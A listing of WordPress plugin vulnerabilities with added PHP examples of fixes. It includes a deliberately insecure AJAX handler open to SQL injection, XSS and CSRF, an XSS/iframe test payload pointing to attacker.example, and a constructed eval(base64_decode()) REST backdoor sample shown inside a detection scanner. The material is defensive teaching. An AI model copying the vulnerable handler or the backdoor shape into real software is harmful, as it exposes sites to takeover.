Vulnerabilities

Column key: date listed, CVE ID and vulnerability title; description; then attack vector, attack complexity, vendor, CWE and CVSS score (risk).
2024-01-16 CVE-2021-24567 Cross-site Scripting vulnerability in Nickmomrik Simple Post
The Simple Post WordPress plugin through 1.1 does not sanitize the Text value submitted by an authenticated user, and does not escape it when outputting it to the browser, leading to an authenticated stored cross-site scripting (XSS) issue.
Attack vector: network; attack complexity: low; vendor: nickmomrik; CWE-79; CVSS score: 5.4
2024-01-16 CVE-2021-24869 SQL Injection vulnerability in Wpfastestcache WP Fastest Cache
The WP Fastest Cache WordPress plugin before 0.9.5 does not escape user input in the set_urls_with_terms method before using it in a SQL statement, leading to an SQL injection exploitable by low-privilege users such as subscribers.
Attack vector: network; attack complexity: low; vendor: wpfastestcache; CWE-89; CVSS score: 8.8
2024-01-16 CVE-2021-24870 Cross-Site Request Forgery (CSRF) vulnerability in Wpfastestcache WP Fastest Cache
The WP Fastest Cache WordPress plugin before 0.9.5 lacks a CSRF check in its wpfc_save_cdn_integration AJAX action, and does not sanitise and escape some of the options settable via that action, which could allow attackers to trick logged-in high-privilege users into calling it and storing a cross-site scripting payload.
Attack vector: network; attack complexity: low; vendor: wpfastestcache; CWE-352; CVSS score: 6.1
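The two WP Fastest Cache entries above describe one handler shape: an admin-ajax action that reads request parameters, writes them into options or a SQL statement, and later echoes them back. The following is an added illustration of that shape beside a hardened version; it is not the plugin's code, and the action name demo_save_cdn, the option demo_cdn_host, the table demo_urls and the function names are invented for the example.

```php
<?php
// Added example, not WP Fastest Cache code. Action, option, table and function
// names are hypothetical.

// --- Vulnerable shape: no nonce, no capability check, raw input into SQL and output ---
add_action( 'wp_ajax_demo_save_cdn_vuln', 'demo_save_cdn_vuln' );
function demo_save_cdn_vuln() {
    global $wpdb;
    // 1. Every logged-in user (subscribers included) reaches this action, and a
    //    cross-site form can make an administrator's browser send it: CSRF (CWE-352).
    $cdn_host = $_POST['cdn_host'];                 // unsanitised
    $term     = $_POST['term'];
    update_option( 'demo_cdn_host', $cdn_host );    // stored as-is
    // 2. Unescaped value interpolated into SQL: SQL injection (CWE-89).
    $rows = $wpdb->get_results( "SELECT url FROM {$wpdb->prefix}demo_urls WHERE term = '$term'" );
    // 3. Stored value echoed into an attribute without escaping: XSS (CWE-79).
    echo '<input type="text" value="' . get_option( 'demo_cdn_host' ) . '">';
    wp_die();
}

// --- Hardened shape ---
add_action( 'wp_ajax_demo_save_cdn', 'demo_save_cdn' );
function demo_save_cdn() {
    global $wpdb;
    // CSRF: the request must carry a nonce minted for this action on the settings
    // page (wp_create_nonce( 'demo_save_cdn' )), sent as the 'nonce' field. Dies on failure.
    check_ajax_referer( 'demo_save_cdn', 'nonce' );
    // Authorisation: only users allowed to change settings, not every logged-in user.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // Sanitise on input. wp_unslash() undoes WordPress' request slashing first.
    $cdn_host = sanitize_text_field( wp_unslash( $_POST['cdn_host'] ?? '' ) );
    $term     = sanitize_text_field( wp_unslash( $_POST['term'] ?? '' ) );
    update_option( 'demo_cdn_host', $cdn_host );
    // SQL: placeholders through $wpdb->prepare(), never string interpolation.
    $rows = $wpdb->get_results(
        $wpdb->prepare( "SELECT url FROM {$wpdb->prefix}demo_urls WHERE term = %s", $term )
    );
    // Escape on output with the escaper for the context (an attribute here).
    $html = '<input type="text" value="' . esc_attr( get_option( 'demo_cdn_host', '' ) ) . '">';
    wp_send_json_success( array( 'html' => $html, 'count' => count( $rows ) ) );
}
```

The nonce and the capability check are independent defences: a nonce proves the request was intended by the user's browser, not that the user is allowed to do anything. The subscriber-level SQL injection in CVE-2021-24869 is reachable by a direct request from that subscriber, so only the capability check and the prepared statement close it.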
2024-01-16 CVE-2021-25117 Cross-Site Request Forgery (CSRF) vulnerability in Lesterchan Wp-Postratings
The WP-PostRatings WordPress plugin before 1.86.1 does not sanitise the postratings_image parameter from its options page (wp-admin/admin.php?page=wp-postratings/postratings-options.php).
Attack vector: network; attack complexity: low; vendor: lesterchan; CWE-352; CVSS score: 4.8
2024-01-16 CVE-2021-4227 Injection vulnerability in OBG ARK Wysiwyg Comment Editor
The ark-commenteditor WordPress plugin through 2.15.6 does not properly sanitise or encode comments submitted through its Source editor, allowing attackers to inject an iframe into the page and thus load arbitrary content from any site into the comment section.
Attack vector: network; attack complexity: low; vendor: obg; CWE-74; CWE-79 CVSS score: 5.3
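Comment bodies have to keep some HTML, so the fix for the iframe injection above is an allow-list sanitiser on input rather than escaping on output. The following is an added example, not the ark-commenteditor plugin's code; the allow-list and function names are assumptions for illustration, and the sample comment is constructed.

```php
<?php
// Added example, not ark-commenteditor code. Allow-list and names are hypothetical.

// Explicit allow-list: tags and, per tag, the attributes that may survive.
// Nothing that embeds remote content (iframe, object, embed, script) is present.
function demo_comment_allowed_html(): array {
    return array(
        'a'          => array( 'href' => true, 'title' => true, 'rel' => true ),
        'b'          => array(), 'strong' => array(), 'i' => array(), 'em' => array(),
        'code'       => array(), 'pre' => array(),
        'blockquote' => array( 'cite' => true ),
        'p'          => array(), 'br' => array(),
        'ul'         => array(), 'ol' => array(), 'li' => array(),
    );
}

// wp_kses() drops tags not in the list, attributes not listed for their tag, and
// disallowed URL protocols in href/cite (so a javascript: href loses its scheme).
function demo_sanitize_comment_html( string $html ): string {
    return wp_kses( $html, demo_comment_allowed_html(), wp_allowed_protocols() );
}

// Hook it on the comment content before it is stored, whichever editor mode
// (WYSIWYG or Source) produced the markup. The value on this filter is slashed,
// so unslash before filtering and re-slash afterwards.
add_filter( 'pre_comment_content', function ( $content ) {
    return wp_slash( demo_sanitize_comment_html( wp_unslash( $content ) ) );
}, 10, 1 );

// Constructed input as the Source editor might submit it:
$raw = '<p>Nice post</p><iframe src="https://attacker.example/"></iframe>'
     . '<a href="javascript:alert(1)">x</a>';
// demo_sanitize_comment_html( $raw ) keeps the paragraph and the link text,
// removes the iframe element entirely, and strips the javascript: scheme from href.
```

Sanitising here, at the storage boundary, is what stops the Source editor bypass; client-side editor modes are not a security control.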
2024-01-16 CVE-2022-0402 Cross-site Scripting vulnerability in Super-Forms Super Forms
The Super Forms - Drag & Drop Form Builder WordPress plugin before 6.0.4 does not escape the bob_czy_panstwa_sprawa_zostala_rozwiazana parameter before outputting it back in an attribute via the super_language_switcher AJAX action, leading to a reflected cross-site scripting issue.
Attack vector: network; attack complexity: low; vendor: super-forms; CWE-79; CVSS score: 6.1
2024-01-16 CVE-2022-0775 Incorrect Authorization vulnerability in Woocommerce
The WooCommerce WordPress plugin before 6.2.1 does not perform a proper authorisation check when deleting reviews, which could allow any authenticated user, such as a subscriber, to delete arbitrary comments.
Attack vector: network; attack complexity: low; vendor: woocommerce; CWE-863; CVSS score: 4.3
2024-01-16 CVE-2022-1538 Unrestricted Upload of File with Dangerous Type vulnerability in Themely Theme Demo Import
The Theme Demo Import WordPress plugin before 1.1.1 does not validate the imported file, allowing high-privilege users such as administrators to upload arbitrary files (such as PHP) even when the DISALLOW_FILE_MODS and DISALLOW_FILE_EDIT constants are set.
Attack vector: network; attack complexity: low; vendor: themely; CWE-434; CVSS score: 7.2
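The point of the Theme Demo Import entry is that an administrator-only upload path still has to honour the site's file-modification lockdown and validate what it writes to disk. The following added example, not the plugin's code, shows an import handler that does both; the function name, the context string passed to wp_is_file_mod_allowed() and the allowed demo-file types are assumptions.

```php
<?php
// Added example, not Theme Demo Import code. Names, context string and the
// XML/JSON allow-list are hypothetical.

// $file is one entry of $_FILES: array( 'name' => ..., 'tmp_name' => ..., ... ).
function demo_import_accept_upload( array $file ) {
    // 1. Respect the site-wide lockdown. DISALLOW_FILE_MODS (and the
    //    'file_mod_allowed' filter) must block any code path that writes files
    //    into the install, even for administrators.
    if ( ! wp_is_file_mod_allowed( 'demo_import' ) ) {
        return new WP_Error( 'file_mods_disallowed', 'File modifications are disabled on this site.' );
    }

    // 2. Validate by extension and content, not by the client-supplied MIME type.
    //    Only the formats the importer can actually parse are allowed.
    $allowed = array( 'xml' => 'text/xml', 'json' => 'application/json' );
    $check   = wp_check_filetype_and_ext( $file['tmp_name'], $file['name'], $allowed );
    if ( false === $check['ext'] || false === $check['type'] ) {
        return new WP_Error( 'bad_type', 'Only XML or JSON demo files are accepted.' );
    }

    // 3. Belt and braces: refuse any PHP-executable extension anywhere in the
    //    name (import.php, import.php.xml, .phtml, .phar), whatever step 2 said.
    if ( preg_match( '/\.(php\d?|phtml|phar)(\.|$)/i', $file['name'] ) ) {
        return new WP_Error( 'php_upload', 'Executable files are not accepted.' );
    }

    // 4. Store under a server-chosen name in the uploads tree, never in the
    //    plugin or theme directory, and never using the original file name.
    $dir = wp_upload_dir()['basedir'] . '/demo-import';
    if ( ! wp_mkdir_p( $dir ) ) {
        return new WP_Error( 'mkdir_failed', 'Could not create import directory.' );
    }
    $dest = $dir . '/' . wp_generate_uuid4() . '.' . $check['ext'];
    if ( ! move_uploaded_file( $file['tmp_name'], $dest ) ) {
        return new WP_Error( 'move_failed', 'Could not store the uploaded file.' );
    }
    return $dest;
}
```

A current_user_can( 'manage_options' ) check alone would not have addressed this entry: the reporter's point is that the upload worked for administrators on a site whose operator had explicitly disabled file modifications.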
2024-01-16 CVE-2022-1563 Unspecified vulnerability in Wpengine Wpgraphql
The WPGraphQL WooCommerce WordPress plugin before 0.12.4 does not prevent unauthenticated attackers from enumerating a shop's coupon codes and values via GraphQL.
Attack vector: network; attack complexity: low; vendor: wpengine; CVSS score: 5.3
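The WooCommerce review-deletion entry (CVE-2022-0775) and the WPGraphQL WooCommerce coupon entry (CVE-2022-1563) are both missing-authorisation bugs: being logged in, or being able to reach an endpoint, was treated as permission. The following added example, not the code of either project, shows the two checks a handler needs: an object-level check against the specific comment, and a deny-by-default gate on data that only shop staff should see. Function names are invented; the 'review' comment type is an assumption about the data model.

```php
<?php
// Added example, not WooCommerce or WPGraphQL WooCommerce code. Names hypothetical.

// Deleting a review: the check is against THIS comment, not just "is logged in".
function demo_delete_review( int $comment_id ) {
    $comment = get_comment( $comment_id );
    if ( ! $comment || 'review' !== $comment->comment_type ) {        // assumed type
        return new WP_Error( 'not_found', 'No such review.', array( 'status' => 404 ) );
    }
    // 'edit_comment' is a meta capability that WordPress maps to editing the
    // comment's parent post, so a subscriber fails it for other people's reviews.
    $is_moderator = current_user_can( 'edit_comment', $comment_id );
    // The review's own author may remove it (only for comments tied to a user account).
    $is_author = (int) $comment->user_id > 0
        && (int) $comment->user_id === get_current_user_id();
    if ( ! $is_moderator && ! $is_author ) {
        return new WP_Error( 'forbidden', 'You may not delete this review.', array( 'status' => 403 ) );
    }
    return wp_delete_comment( $comment_id, true );
}

// Coupon codes: deny by default. Anonymous or ordinary customers get nothing,
// so a public query cannot enumerate codes and values.
function demo_resolve_coupon_ids(): array {
    if ( ! is_user_logged_in() || ! current_user_can( 'manage_woocommerce' ) ) {
        return array();
    }
    return get_posts( array(
        'post_type'   => 'shop_coupon',
        'post_status' => 'publish',
        'fields'      => 'ids',
        'numberposts' => -1,
    ) );
}
```

The same two questions apply whether the request arrives through admin-ajax, the REST API or GraphQL: does this user hold the right over this object, and who may read this field at all. A resolver or callback that answers the second question with "anyone" must be a deliberate decision, not the absence of a check.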
2024-01-16 CVE-2022-1609 Code Injection vulnerability in Weblizar School Management
The School Management WordPress plugin before 9.9.7 contains an obfuscated backdoor injected into its license-checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.
Attack vector: network; attack complexity: low; vendor: weblizar; CWE-94; CVSS score: 9.8 (critical)
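A planted handler of the kind described in the School Management entry has a recognisable shape: a REST route that anyone may call, whose callback feeds decoded data into a code-execution primitive. The following is an added hunting heuristic, not the plugin's code and not a reproduction of the actual backdoor; the indicator names, the scoring rule and both sample sources are constructed for the example.

```php
<?php
// Added example: a triage heuristic for plugin directories. Not the School
// Management plugin's code. Indicator names and samples are constructed.

// Return the indicators found in one PHP source string.
function demo_rest_backdoor_indicators( string $src ): array {
    $hits = array();
    if ( preg_match( '/register_rest_route\s*\(/', $src ) ) {
        $hits[] = 'registers_rest_route';
    }
    // A route open to everyone is not wrong by itself; combined with code
    // execution below it is the shape an unauthenticated backdoor takes.
    if ( preg_match( '/permission_callback[\'"]?\s*=>\s*[\'"]__return_true[\'"]/', $src ) ) {
        $hits[] = 'unauthenticated_route';
    }
    if ( preg_match( '/\b(eval|assert|create_function)\s*\(/', $src ) ) {
        $hits[] = 'dynamic_code';
    }
    if ( preg_match( '/\b(base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(/', $src ) ) {
        $hits[] = 'decoder';
    }
    // A long base64-looking literal is a crude obfuscation signal.
    if ( preg_match( '/[\'"][A-Za-z0-9+\/=]{200,}[\'"]/', $src ) ) {
        $hits[] = 'long_encoded_literal';
    }
    return $hits;
}

// Walk a plugins directory and report files that both register a route and
// contain a code-execution primitive. Review the hits by hand; this is triage.
function demo_scan_plugin_dir( string $dir ): array {
    $findings = array();
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator( $dir, FilesystemIterator::SKIP_DOTS )
    );
    foreach ( $it as $f ) {
        if ( 'php' !== strtolower( $f->getExtension() ) ) {
            continue;
        }
        $hits = demo_rest_backdoor_indicators( (string) file_get_contents( $f->getPathname() ) );
        if ( in_array( 'registers_rest_route', $hits, true ) && in_array( 'dynamic_code', $hits, true ) ) {
            $findings[ $f->getPathname() ] = $hits;
        }
    }
    return $findings;
}

// Constructed sample: the shape of a planted handler (not the real payload).
$suspicious = <<<'PHP'
add_action('rest_api_init', function () {
  register_rest_route('lic/v1', '/check', array(
    'methods' => 'POST',
    'permission_callback' => '__return_true',
    'callback' => function ($r) { eval(base64_decode($r['d'])); },
  ));
});
PHP;

// Constructed sample: a legitimate route with a real permission callback.
$benign = <<<'PHP'
add_action('rest_api_init', function () {
  register_rest_route('demo/v1', '/settings', array(
    'methods' => 'GET',
    'permission_callback' => function () { return current_user_can('manage_options'); },
    'callback' => 'demo_get_settings',
  ));
});
PHP;

print_r( demo_rest_backdoor_indicators( $suspicious ) );
// registers_rest_route, unauthenticated_route, dynamic_code, decoder
print_r( demo_rest_backdoor_indicators( $benign ) );
// registers_rest_route
```

Run demo_scan_plugin_dir( WP_PLUGIN_DIR ) from a WP-CLI or cron context, and pair it with a file-integrity comparison against the plugin's published release, since an injected block in otherwise legitimate licensing code will not stand out on a directory listing.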